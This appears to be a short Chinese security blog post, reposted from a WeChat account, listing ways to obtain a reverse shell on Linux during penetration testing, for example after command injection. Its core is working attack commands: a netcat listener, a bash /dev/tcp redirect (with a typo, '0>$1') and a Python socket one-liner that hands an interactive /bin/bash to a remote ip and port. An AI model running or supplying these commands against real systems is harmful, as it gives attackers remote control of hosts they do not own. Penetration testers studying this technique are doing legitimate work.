几种Linux下反弹shell的方法总结

  • A+
所属分类:安全文章

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。

一、nc和bash

在我们的主机上执行 nc -lvp port

表示显示执行过程监听端口

在目标主机上执行 bash -i >& /dev/tcp/ip/port 0>$1

几种Linux下反弹shell的方法总结

这样就可以在我们的主机上执行命令了

几种Linux下反弹shell的方法总结

 

二、nc和python

在我们的主机上执行 nc -lvp port

表示显示执行过程监听端口

服务端执行以下命令

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

注意修改ip和port为主机的ip和端口

几种Linux下反弹shell的方法总结

测试效果如下

几种Linux下反弹shell的方法总结

几种Linux下反弹shell的方法总结


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持几种Linux下反弹shell的方法总结

“如侵权请私聊公众号删文”



扫描关注LemonSec

几种Linux下反弹shell的方法总结

觉得不错点个“赞”、“在看”哦几种Linux下反弹shell的方法总结


本文始发于微信公众号(LemonSec):几种Linux下反弹shell的方法总结

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: